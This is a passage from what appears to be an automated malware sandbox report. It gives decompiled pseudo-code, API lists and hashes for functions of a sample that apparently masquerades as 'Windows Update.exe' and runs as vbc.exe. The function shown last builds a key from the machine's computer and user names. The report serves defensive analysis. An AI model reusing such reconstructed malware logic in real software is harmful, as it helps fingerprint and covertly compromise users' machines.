                                                                                              • Opcode Fuzzy Hash: 829d2906a4e1aa3164176bf7ab706f29f81f0af0ee9c7b1f46b6600de564c79c
                                                                                              • Instruction Fuzzy Hash: D7F0A431A0020CFBDB109FA1DD49B9EBFB9EB04711F00427AF805B22A0DB754A40CA98
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004062B8, Relevance: 7.6, APIs: 5, Instructions: 110COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 79%
                                                                                              			E004062B8(void* __edx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				void* __ebx;
				void* __edi;
				signed int _t34;
				signed int _t40;
				int _t45;
				int _t52;
				void* _t53;
				void* _t55;
				int _t57;
				signed int _t63;
				int _t67;
				short* _t71;
				signed int _t72;
				short* _t73;

				_t34 =  *0x412014; // 0x8e1d7674
				_v8 = _t34 ^ _t72;
				_push(_t53);
				E00403F2B(_t53,  &_v28, __edx, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t52 =  *(_v24 + 8);
					_t57 = _t52;
					_a24 = _t52;
				}
				_t67 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					E004018CC();
					return _t67;
				}
				_t55 = _t40 + _t40;
				_t17 = _t55 + 8; // 0x8
				asm("sbb eax, eax");
				if((_t17 & _t40) == 0) {
					_t71 = 0;
					L11:
					if(_t71 != 0) {
						E00402460(_t67, _t71, _t67, _t55);
						_t45 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t71, _v12);
						if(_t45 != 0) {
							_t67 = GetStringTypeW(_a8, _t71, _t45, _a20);
						}
					}
					L14:
					E004063D5(_t71);
					goto L15;
				}
				_t20 = _t55 + 8; // 0x8
				asm("sbb eax, eax");
				_t47 = _t40 & _t20;
				_t21 = _t55 + 8; // 0x8
				_t63 = _t21;
				if((_t40 & _t20) > 0x400) {
					asm("sbb eax, eax");
					_t71 = E00403E3D(_t63, _t47 & _t63);
					if(_t71 == 0) {
						goto L14;
					}
					 *_t71 = 0xdddd;
					L9:
					_t71 =  &(_t71[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E004018E0();
				_t71 = _t73;
				if(_t71 == 0) {
					goto L14;
				}
				 *_t71 = 0xcccc;
				goto L9;
			}























                                                                                              0x004062c0
                                                                                              0x004062c7
                                                                                              0x004062ca
                                                                                              0x004062d3
                                                                                              0x004062d8
                                                                                              0x004062dd
                                                                                              0x004062e2
                                                                                              0x004062e5
                                                                                              0x004062e7
                                                                                              0x004062e7
                                                                                              0x004062ec
                                                                                              0x00406305
                                                                                              0x0040630b
                                                                                              0x00406310
                                                                                              0x004063af
                                                                                              0x004063b3
                                                                                              0x004063b8
                                                                                              0x004063b8
                                                                                              0x004063cc
                                                                                              0x004063d4
                                                                                              0x004063d4
                                                                                              0x00406316
                                                                                              0x00406319
                                                                                              0x0040631e
                                                                                              0x00406322
                                                                                              0x0040636e
                                                                                              0x00406370
                                                                                              0x00406372
                                                                                              0x00406377
                                                                                              0x0040638e
                                                                                              0x00406396
                                                                                              0x004063a6
                                                                                              0x004063a6
                                                                                              0x00406396
                                                                                              0x004063a8
                                                                                              0x004063a9
                                                                                              0x00000000
                                                                                              0x004063ae
                                                                                              0x00406324
                                                                                              0x00406329
                                                                                              0x0040632b
                                                                                              0x0040632d
                                                                                              0x0040632d
                                                                                              0x00406335
                                                                                              0x00406352
                                                                                              0x0040635c
                                                                                              0x00406361
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406363
                                                                                              0x00406369
                                                                                              0x00406369
                                                                                              0x00000000
                                                                                              0x00406369
                                                                                              0x00406339
                                                                                              0x0040633d
                                                                                              0x00406342
                                                                                              0x00406346
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406348
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,00000000), ref: 00406305
                                                                                              • __alloca_probe_16.LIBCMT ref: 0040633D
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0040638E
                                                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 004063A0
                                                                                              • __freea.LIBCMT ref: 004063A9
                                                                                                • Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000001.306979725.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000A.00000001.307043885.0000000000414000.00000040.00020000.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                              • String ID:
                                                                                              • API String ID: 313313983-0
                                                                                              • Opcode ID: 3668a24b8cc91a8edc8bb6444902db7ad8a914eb3222a5b1c35fe0f4f695b84c
                                                                                              • Instruction ID: a1348b344bfdb8beedea85c2379656fd8e164ea4191dcb9080565a587d22e55f
                                                                                              • Opcode Fuzzy Hash: 3668a24b8cc91a8edc8bb6444902db7ad8a914eb3222a5b1c35fe0f4f695b84c
                                                                                              • Instruction Fuzzy Hash: AE31B072A0020AABDF249F65DC85DAF7BA5EF40310B05423EFC05E6290E739CD65DB94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00409BDD, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E00409BDD(void* __eflags, signed int _a4) {
				intOrPtr _t13;
				void* _t21;
				signed int _t33;
				long _t35;

				_t33 = _a4;
				if(E00405D6E(_t33) != 0xffffffff) {
					_t13 =  *0x4130a0; // 0x777e50
					if(_t33 != 1 || ( *(_t13 + 0x88) & 0x00000001) == 0) {
						if(_t33 != 2 || ( *(_t13 + 0x58) & 0x00000001) == 0) {
							goto L7;
						} else {
							goto L6;
						}
					} else {
						L6:
						_t21 = E00405D6E(2);
						if(E00405D6E(1) == _t21) {
							goto L1;
						}
						L7:
						if(CloseHandle(E00405D6E(_t33)) != 0) {
							goto L1;
						}
						_t35 = GetLastError();
						L9:
						E00405CDD(_t33);
						 *((char*)( *((intOrPtr*)(0x4130a0 + (_t33 >> 6) * 4)) + 0x28 + (_t33 & 0x0000003f) * 0x30)) = 0;
						if(_t35 == 0) {
							return 0;
						}
						return E004047FB(_t35) | 0xffffffff;
					}
				}
				L1:
				_t35 = 0;
				goto L9;
			}







                                                                                              0x00409be4
                                                                                              0x00409bf1
                                                                                              0x00409bf7
                                                                                              0x00409bff
                                                                                              0x00409c0d
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00409c15
                                                                                              0x00409c15
                                                                                              0x00409c17
                                                                                              0x00409c29
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00409c2b
                                                                                              0x00409c3b
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00409c43
                                                                                              0x00409c45
                                                                                              0x00409c46
                                                                                              0x00409c5e
                                                                                              0x00409c65
                                                                                              0x00000000
                                                                                              0x00409c73
                                                                                              0x00000000
                                                                                              0x00409c6e
                                                                                              0x00409bff
                                                                                              0x00409bf3
                                                                                              0x00409bf3
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • CloseHandle.KERNEL32(00000000,00000000,?,?,00409AFB,?), ref: 00409C33
                                                                                              • GetLastError.KERNEL32(?,00409AFB,?), ref: 00409C3D
                                                                                              • __dosmaperr.LIBCMT ref: 00409C68
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.382308490.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseErrorHandleLast__dosmaperr
                                                                                              • String ID: P~w
                                                                                              • API String ID: 2583163307-3961538373
                                                                                              • Opcode ID: 277ef4b28ba21e7869a9afc97e153c7bd23dabc2d40ad927f4a03f7d3a602357
                                                                                              • Instruction ID: 87f0d20415a4ba4edce453f192d75aa6f60acf784ef8f37888f2bef7d94c0d71
                                                                                              • Opcode Fuzzy Hash: 277ef4b28ba21e7869a9afc97e153c7bd23dabc2d40ad927f4a03f7d3a602357
                                                                                              • Instruction Fuzzy Hash: 12014832A0815056E2242735A989B6F77C9DB82B34F28013FF809B72C3DE389C82919C
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00405751, Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 95%
                                                                                              			E00405751(signed int _a4) {
				signed int _t9;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0x412fc8 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0x40cd48 + _t9 * 4);
					_t27 = LoadLibraryExW(_t22, 0, 0x800);
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0x8e1d7675
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}










                                                                                              0x00405756
                                                                                              0x0040575a
                                                                                              0x00405761
                                                                                              0x00405765
                                                                                              0x00405773
                                                                                              0x00405789
                                                                                              0x0040578d
                                                                                              0x004057b6
                                                                                              0x004057b8
                                                                                              0x004057bc
                                                                                              0x004057bf
                                                                                              0x004057bf
                                                                                              0x004057c5
                                                                                              0x004057c7
                                                                                              0x00000000
                                                                                              0x004057c8
                                                                                              0x0040578f
                                                                                              0x00405798
                                                                                              0x004057a7
                                                                                              0x0040579a
                                                                                              0x0040579d
                                                                                              0x004057a3
                                                                                              0x004057a3
                                                                                              0x004057ab
                                                                                              0x00000000
                                                                                              0x004057ad
                                                                                              0x004057b0
                                                                                              0x004057b2
                                                                                              0x00000000
                                                                                              0x004057b2
                                                                                              0x004057ab
                                                                                              0x00405767
                                                                                              0x0040576c
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue), ref: 00405783
                                                                                              • GetLastError.KERNEL32(?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000,00000364,?,004043F2), ref: 0040578F
                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000), ref: 0040579D
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000001.306979725.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000A.00000001.307043885.0000000000414000.00000040.00020000.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                              • String ID:
                                                                                              • API String ID: 3177248105-0
                                                                                              • Opcode ID: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
                                                                                              • Instruction ID: a071a87d579bf16c10ed97f701b3afe57148fc5a73c01e838bdae708b7fec84a
                                                                                              • Opcode Fuzzy Hash: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
                                                                                              • Instruction Fuzzy Hash: 2001AC36612622DBD7214BA89D84E577BA8EF45B61F100635FA05F72C0D734D811DEE8
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00404320, Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 71%
                                                                                              			E00404320(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_t36 = GetLastError();
				_t2 =  *0x412064; // 0xffffffff
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E00403ECE(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E004058CE(_t25, __eflags,  *0x412064, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E00404192(_t25, _t31, 0x4132a4);
							E00403E03(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E00403E03();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E00403E8B(_t20, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0x412064; // 0xffffffff
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E00403ECE(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E004058CE(_t27, __eflags,  *0x412064, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E00404192(_t27, _t32, 0x4132a4);
									E00403E03(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E00403E03();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E00405878(_t25, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E00405878(_t23, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}





















                                                                                              0x00404320
                                                                                              0x00404320
                                                                                              0x00404320
                                                                                              0x0040432a
                                                                                              0x0040432c
                                                                                              0x00404331
                                                                                              0x00404334
                                                                                              0x00404342
                                                                                              0x00404349
                                                                                              0x0040434e
                                                                                              0x00404351
                                                                                              0x00404354
                                                                                              0x00404366
                                                                                              0x0040436b
                                                                                              0x0040436d
                                                                                              0x00404378
                                                                                              0x0040437f
                                                                                              0x00404384
                                                                                              0x00404387
                                                                                              0x00404389
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040436f
                                                                                              0x0040436f
                                                                                              0x00000000
                                                                                              0x0040436f
                                                                                              0x00404356
                                                                                              0x00404356
                                                                                              0x00404357
                                                                                              0x00404357
                                                                                              0x0040435c
                                                                                              0x00404397
                                                                                              0x00404398
                                                                                              0x0040439e
                                                                                              0x004043a3
                                                                                              0x004043a6
                                                                                              0x004043a7
                                                                                              0x004043a8
                                                                                              0x004043af
                                                                                              0x004043b1
                                                                                              0x004043b3
                                                                                              0x004043b8
                                                                                              0x004043bb
                                                                                              0x004043c9
                                                                                              0x004043d5
                                                                                              0x004043d8
                                                                                              0x004043db
                                                                                              0x004043ed
                                                                                              0x004043f2
                                                                                              0x004043f4
                                                                                              0x004043ff
                                                                                              0x00404405
                                                                                              0x0040440d
                                                                                              0x0040440f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004043f6
                                                                                              0x004043f6
                                                                                              0x00000000
                                                                                              0x004043f6
                                                                                              0x004043dd
                                                                                              0x004043dd
                                                                                              0x004043de
                                                                                              0x004043de
                                                                                              0x00404411
                                                                                              0x00404412
                                                                                              0x00404412
                                                                                              0x004043bd
                                                                                              0x004043c3
                                                                                              0x004043c7
                                                                                              0x0040441a
                                                                                              0x0040441b
                                                                                              0x00404421
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004043c7
                                                                                              0x00404428
                                                                                              0x00404428
                                                                                              0x00404336
                                                                                              0x0040433c
                                                                                              0x00404340
                                                                                              0x0040438b
                                                                                              0x0040438c
                                                                                              0x00404396
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00404340

                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(?,?,004037D2,?,?,004016EA,00000000,?,00410E40), ref: 00404324
                                                                                              • SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 0040438C
                                                                                              • SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 00404398
                                                                                              • _abort.LIBCMT ref: 0040439E
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000001.306979725.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000A.00000001.307043885.0000000000414000.00000040.00020000.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$_abort
                                                                                              • String ID:
                                                                                              • API String ID: 88804580-0
                                                                                              • Opcode ID: 62ede4f37894db3567f5427a1490bbed1412223467fdb5f37ac402c07740c3c0
                                                                                              • Instruction ID: 10f1ed76ee289f7058500775698c1b2aead1ecf844b9f3100802fdeea25ad27f
                                                                                              • Opcode Fuzzy Hash: 62ede4f37894db3567f5427a1490bbed1412223467fdb5f37ac402c07740c3c0
                                                                                              • Instruction Fuzzy Hash: 75F0A976204701A6C21237769D0AB6B2A1ACBC1766F25423BFF18B22D1EF3CCD42859D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004025BA, Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E004025BA() {
				void* _t4;
				void* _t8;

				E00402AE5();
				E00402A79();
				if(E004027D9() != 0) {
					_t4 = E0040278B(_t8, __eflags);
					__eflags = _t4;
					if(_t4 != 0) {
						return 1;
					} else {
						E00402815();
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}





                                                                                              0x004025ba
                                                                                              0x004025bf
                                                                                              0x004025cb
                                                                                              0x004025d0
                                                                                              0x004025d5
                                                                                              0x004025d7
                                                                                              0x004025e2
                                                                                              0x004025d9
                                                                                              0x004025d9
                                                                                              0x00000000
                                                                                              0x004025d9
                                                                                              0x004025cd
                                                                                              0x004025cd
                                                                                              0x004025cf
                                                                                              0x004025cf

                                                                                              APIs
                                                                                              • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 004025BA
                                                                                              • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 004025BF
                                                                                              • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 004025C4
                                                                                                • Part of subcall function 004027D9: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 004027EA
                                                                                              • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 004025D9
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000001.306979725.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000A.00000001.307043885.0000000000414000.00000040.00020000.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                                              • String ID:
                                                                                              • API String ID: 1761009282-0
                                                                                              • Opcode ID: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
                                                                                              • Instruction ID: 4128bea016199bb2a2d03f508bec19fe8aa18f4adc422371eefe93b2158e2da6
                                                                                              • Opcode Fuzzy Hash: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
                                                                                              • Instruction Fuzzy Hash: E0C0024414014264DC6036B32F2E5AA235409A63CDBD458BBA951776C3ADFD044A553E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00402E79, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 87%
                                                                                              			E00402E79(intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				intOrPtr* _t35;
				struct HINSTANCE__* _t36;
				struct HINSTANCE__* _t42;
				intOrPtr* _t43;
				intOrPtr* _t44;
				WCHAR* _t48;
				struct HINSTANCE__* _t49;
				struct HINSTANCE__* _t53;
				intOrPtr* _t56;
				struct HINSTANCE__* _t61;
				intOrPtr _t62;

				if(_a4 == 2 || _a4 == 1) {
					GetModuleFileNameW(0, 0x412bf8, 0x104);
					_t48 =  *0x412e7c; // 0x761c5a
					 *0x412e80 = 0x412bf8;
					if(_t48 == 0 ||  *_t48 == 0) {
						_t48 = 0x412bf8;
					}
					_v8 = 0;
					_v16 = 0;
					E00402F98(_t48, 0, 0,  &_v8,  &_v16);
					_t61 = E0040311E(_v8, _v16, 2);
					if(_t61 != 0) {
						E00402F98(_t48, _t61, _t61 + _v8 * 4,  &_v8,  &_v16);
						if(_a4 != 1) {
							_v12 = 0;
							_push( &_v12);
							_t49 = E00404D5E(_t61);
							if(_t49 == 0) {
								_t56 = _v12;
								_t53 = 0;
								_t35 = _t56;
								if( *_t56 == 0) {
									L15:
									_t36 = 0;
									 *0x412e6c = _t53;
									_v12 = 0;
									_t49 = 0;
									 *0x412e74 = _t56;
									L16:
									E00403E03(_t36);
									_v12 = 0;
									goto L17;
								} else {
									goto L14;
								}
								do {
									L14:
									_t35 = _t35 + 4;
									_t53 =  &(_t53->i);
								} while ( *_t35 != 0);
								goto L15;
							}
							_t36 = _v12;
							goto L16;
						}
						 *0x412e6c = _v8 - 1;
						_t42 = _t61;
						_t61 = 0;
						 *0x412e74 = _t42;
						goto L10;
					} else {
						_t43 = E00404831();
						_push(0xc);
						_pop(0);
						 *_t43 = 0;
						L10:
						_t49 = 0;
						L17:
						E00403E03(_t61);
						return _t49;
					}
				} else {
					_t44 = E00404831();
					_t62 = 0x16;
					 *_t44 = _t62;
					E00404639();
					return _t62;
				}
			}

















                                                                                              0x00402e86
                                                                                              0x00402eb4
                                                                                              0x00402eba
                                                                                              0x00402ec0
                                                                                              0x00402ec8
                                                                                              0x00402ecf
                                                                                              0x00402ecf
                                                                                              0x00402ed4
                                                                                              0x00402edb
                                                                                              0x00402ee2
                                                                                              0x00402ef4
                                                                                              0x00402efb
                                                                                              0x00402f1a
                                                                                              0x00402f26
                                                                                              0x00402f41
                                                                                              0x00402f44
                                                                                              0x00402f4b
                                                                                              0x00402f51
                                                                                              0x00402f58
                                                                                              0x00402f5b
                                                                                              0x00402f5d
                                                                                              0x00402f61
                                                                                              0x00402f6b
                                                                                              0x00402f6b
                                                                                              0x00402f6d
                                                                                              0x00402f73
                                                                                              0x00402f76
                                                                                              0x00402f78
                                                                                              0x00402f7e
                                                                                              0x00402f7f
                                                                                              0x00402f85
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00402f63
                                                                                              0x00402f63
                                                                                              0x00402f63
                                                                                              0x00402f66
                                                                                              0x00402f67
                                                                                              0x00000000
                                                                                              0x00402f63
                                                                                              0x00402f53
                                                                                              0x00000000
                                                                                              0x00402f53
                                                                                              0x00402f2c
                                                                                              0x00402f31
                                                                                              0x00402f33
                                                                                              0x00402f35
                                                                                              0x00000000
                                                                                              0x00402efd
                                                                                              0x00402efd
                                                                                              0x00402f02
                                                                                              0x00402f04
                                                                                              0x00402f05
                                                                                              0x00402f3a
                                                                                              0x00402f3a
                                                                                              0x00402f88
                                                                                              0x00402f89
                                                                                              0x00000000
                                                                                              0x00402f92
                                                                                              0x00402e8e
                                                                                              0x00402e8e
                                                                                              0x00402e95
                                                                                              0x00402e96
                                                                                              0x00402e98
                                                                                              0x00000000
                                                                                              0x00402e9d

                                                                                              APIs
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\Windows Update.exe,00000104), ref: 00402EB4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.382308490.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FileModuleName
                                                                                              • String ID: C:\Users\user\AppData\Roaming\Windows Update.exe$pOv
                                                                                              • API String ID: 514040917-3232758402
                                                                                              • Opcode ID: d65f86be848b3adfa8fae1fc2f580f18a902642f457ef4245597d21aeb7a866c
                                                                                              • Instruction ID: f3d78f03607b51ffb72bb6c03706454bab976d361db7ab759f67f4c6569d847e
                                                                                              • Opcode Fuzzy Hash: d65f86be848b3adfa8fae1fc2f580f18a902642f457ef4245597d21aeb7a866c
                                                                                              • Instruction Fuzzy Hash: 9631C471A00219AFCB21DF99DA8899FBBBCEF84744B10407BF804A72C0D6F44E41DB98
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Analysis Process: vbc.exe PID: 6716 Parent PID: 6244 vbc.exeCOMMON

                                                                                              Executed Functions

                                                                                              Function 0040724C, Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 143stringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E0040724C(signed int _a4) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				void _v20;
				long _v24;
				int _v28;
				int _v32;
				void* _v36;
				void _v291;
				char _v292;
				void _v547;
				char _v548;
				void _v1058;
				short _v1060;
				void _v1570;
				short _v1572;
				int _t88;
				signed int _t91;
				signed int _t92;
				signed int _t94;
				signed int _t96;
				signed int _t99;
				signed int _t104;
				signed short* _t110;
				void* _t113;
				void* _t114;

				_t92 = 0;
				_v20 = 0xa3;
				_v19 = 0x1e;
				_v18 = 0xf3;
				_v17 = 0x69;
				_v16 = 7;
				_v15 = 0x62;
				_v14 = 0xd9;
				_v13 = 0x1f;
				_v12 = 0x1e;
				_v11 = 0xe9;
				_v10 = 0x35;
				_v9 = 0x7d;
				_v8 = 0x4f;
				_v7 = 0xd2;
				_v6 = 0x7d;
				_v5 = 0x48;
				_v292 = 0;
				memset( &_v291, 0, 0xff);
				_v548 = 0;
				memset( &_v547, 0, 0xff);
				_v1572 = 0;
				memset( &_v1570, 0, 0x1fe);
				_v1060 = 0;
				memset( &_v1058, 0, 0x1fe);
				_v36 = _a4 + 4;
				_a4 = 0;
				_v24 = 0xff;
				GetComputerNameA( &_v292,  &_v24); // executed
				_v24 = 0xff;
				GetUserNameA( &_v548,  &_v24); // executed
				MultiByteToWideChar(0, 0,  &_v292, 0xffffffff,  &_v1572, 0xff);
				MultiByteToWideChar(0, 0,  &_v548, 0xffffffff,  &_v1060, 0xff);
				_v32 = strlen( &_v292);
				_t88 = strlen( &_v548);
				_t113 = _v36;
				_v28 = _t88;
				memcpy(_t113,  &_v20, 0x10);
				_t91 = 0xba0da71d;
				if(_v28 > 0) {
					_t110 =  &_v1060;
					do {
						_t104 = _a4 & 0x80000003;
						if(_t104 < 0) {
							_t104 = (_t104 - 0x00000001 | 0xfffffffc) + 1;
						}
						_t96 = ( *_t110 & 0x0000ffff) * _t91;
						_t91 = _t91 * 0xbc8f;
						 *(_t113 + _t104 * 4) =  *(_t113 + _t104 * 4) ^ _t96;
						_a4 = _a4 + 1;
						_t110 =  &(_t110[1]);
					} while (_a4 < _v28);
				}
				if(_v32 > _t92) {
					do {
						_t99 = _a4 & 0x80000003;
						if(_t99 < 0) {
							_t99 = (_t99 - 0x00000001 | 0xfffffffc) + 1;
						}
						_t94 = ( *(_t114 + _t92 * 2 - 0x620) & 0x0000ffff) * _t91;
						_t91 = _t91 * 0xbc8f;
						 *(_t113 + _t99 * 4) =  *(_t113 + _t99 * 4) ^ _t94;
						_a4 = _a4 + 1;
						_t92 = _t92 + 1;
					} while (_t92 < _v32);
				}
				return _t91;
			}









































                                                                                              0x0040725d
                                                                                              0x00407268
                                                                                              0x0040726c
                                                                                              0x00407270
                                                                                              0x00407274
                                                                                              0x00407278
                                                                                              0x0040727c
                                                                                              0x00407280
                                                                                              0x00407284
                                                                                              0x00407288
                                                                                              0x0040728c
                                                                                              0x00407290
                                                                                              0x00407294
                                                                                              0x00407298
                                                                                              0x0040729c
                                                                                              0x004072a0
                                                                                              0x004072a4
                                                                                              0x004072a8
